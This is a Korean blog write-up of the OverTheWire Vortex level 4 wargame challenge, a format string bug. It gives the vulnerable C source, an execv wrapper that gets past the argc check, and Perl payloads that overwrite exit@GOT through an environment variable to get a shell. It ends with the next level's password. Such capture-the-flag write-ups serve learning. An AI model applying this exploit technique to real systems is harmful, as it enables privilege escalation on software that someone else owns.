반응형
우선 FSB를 얼피설피 알고있어서 문서를 보고 공부를 좀햇는데
http://geundi.tistory.com/124 와
http://proneer.tistory.com/entry/FormatString-%ED%8F%AC%EB%A7%B7%EC%8A%A4%ED%8A%B8%EB%A7%81Format-String-Attack
내 블로그에 도움될만한문서에 올려둔
formatstring bug.pdf가 많은 도움이 되었다
+)드디어 풀렸다 .. WoW
To exec or not to exec
This is the common format string bug, exploit it with care though as a check is made with argc. What is the layout of a process’s memory? How are programs executed?
// -- andrewg, original author was zen-parse :)
#include <stdlib.h>
int main(int argc, char **argv)
{
if(argc) exit(0);
printf(argv[3]);
exit(EXIT_FAILURE);
}
위의 소스를 보면 알수있듯이 argc가 존재하면 exit 해버린다 따라서 우회하기 위해서 소스를 짜고 실행햇다
vortex4@melinda:/tmp$ cat test.c
#include <unistd.h>
int main(){
execv("/vortex/vortex4",(char **)NULL);
}
소스를 짜서 실행해보면 아래와같이 나온다
vortex4@melinda:/tmp$ ./te
SSH_CLIENT=221.155.134.193 50713 22vortex4@melinda:/tmp$
argv3 부분이 나오는 것인데 다음은 환경 변수다.
확인해 보았다 .
vortex4@melinda:/tmp$ env
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=221.155.134.193 50713 22
SSH_TTY=/dev/pts/19
LC_ALL=C
USER=vortex4
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
TMOUT=1800
MAIL=/var/mail/vortex4
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
PWD=/tmp
LANG=en_US.UTF-8
SHLVL=1
HOME=/home/vortex4
LOGNAME=vortex4
SSH_CONNECTION=221.155.134.193 50713 178.79.134.250 22
LESSOPEN=| /usr/bin/lesspipe %s
LESSCLOSE=/usr/bin/lesspipe %s %s
OLDPWD=/tmp/test
_=/usr/bin/env
즉 우리가 어디를 바꿔야하는지 타겟은 정해졌다
export SSH_CLIENT=`perl -e 'print "\xaa\xbb\xcc\xddAAAA\xdd\xcc\xbb\xaaBBBBBBBBBBBBBBBBBBB","%8x"x126,"%00030x","%x","%00030x","%x"'`
vortex4@melinda:/tmp$ ./te
SSH_CLIENT=せ炅AAAA汾빽BBBBBBBBBBBBBBBBBBB 0 8048459f7fcaff4 8048450 0 0f7e404b3 0ffffd664ffffd668f7fcf000 0ffffd61cffffd668 0 804822cf7fcaff4 0 0 0705936ec47fa72fc 0 0 0 0 8048360 0f7ff0a90f7e403c9f7ffcff4 0 8048360 0 8048381 8048414 0ffffd664 8048450 80484c0f7feb660ffffd65cf7ffd918 0 0ffffd782ffffd78dffffd79dffffd954ffffd969ffffd97dffffd986ffffd993ffffdeb4ffffdebfffffded6ffffdf23ffffdf2cffffdf3dffffdf45ffffdf58ffffdf68ffffdf9fffffdfbfffffdfe1 0 20f7fdb9c0 21f7fdb000 101f898b75 6 1000 11 64 3 8048034 4 20 5 9 7f7fdc000 8 0 9 8048360 b 138c c 138d d 138c e 138c 17 1 19ffffd76b 1fffffdfe8 fffffd77b 0 0 0 0 0440000004bab58db7a89c7f942f23dd16955f9bf 36383645540000783d4d526d726574454853002f3d4c4c2f6e69626873616248535300494c435f3d544e45ddccbbaa000000000000000000000041414141aabbccdd00000000000000000000004242424242424242vortex4@melinda
vortex4@melinda:/tmp$
잘이해 되지 않는사람들을 위해서 jpg 파일로 친절하게 설명해보면
+)A랑 B랑 조율해주다보면 나온다 ㅡㅡ ;A로 어느정도 맞춰주고 B를 계속늘리는걸 추천한다
esp : 0xffffe430
e430 : 58416
ffff - e430 : 7119
export SSH_CLIENT=`perl -e 'print "\x08\xa0\x04\x08(exit@got)AAAA\x0a\xa0\x04(exit@got+4)\x08BBBBBBBBBBBBBBBBBBB","%8x"x126,"%57366x","%n","%07119x","%n"'`
/bin/sh의 주소의 크기가 커서 한주소안에 모두 넣을수가 없다 따라서 exit@got 의 주소 두군대에 나눠서 써줘야하므로 payload에 표시해두었다
또한, 페이로드를보면 58416 이아니라 57366이 나와있을데 이유는 페이로드의 길이만큼 뺴줘야하고, 맨앞의 11은 SSH_CLIENT 를 의미한다
11+ 4+4+ 4+ 19 + 1008 =1050
` 실행해보면 $ cat /etc/vortex_pass/vortex5
:4VtbC4lr
+)감동 ㅠ ㅁ ㅠ
반응형
'과거의 컴퓨터 공부 > Overthewire@vortex' 카테고리의 다른 글
| (vortex)vortex5 -> vortex 6 (0) | 2014.09.08 |
|---|---|
| (vortex)level3->level4 (0) | 2014.09.07 |
| (Vortex)Level2->Level3 (0) | 2014.09.05 |
| (vortex) Level1 -> Level2 (0) | 2014.09.05 |
| (vortex) Level 0 -> Level1 (0) | 2014.09.05 |
,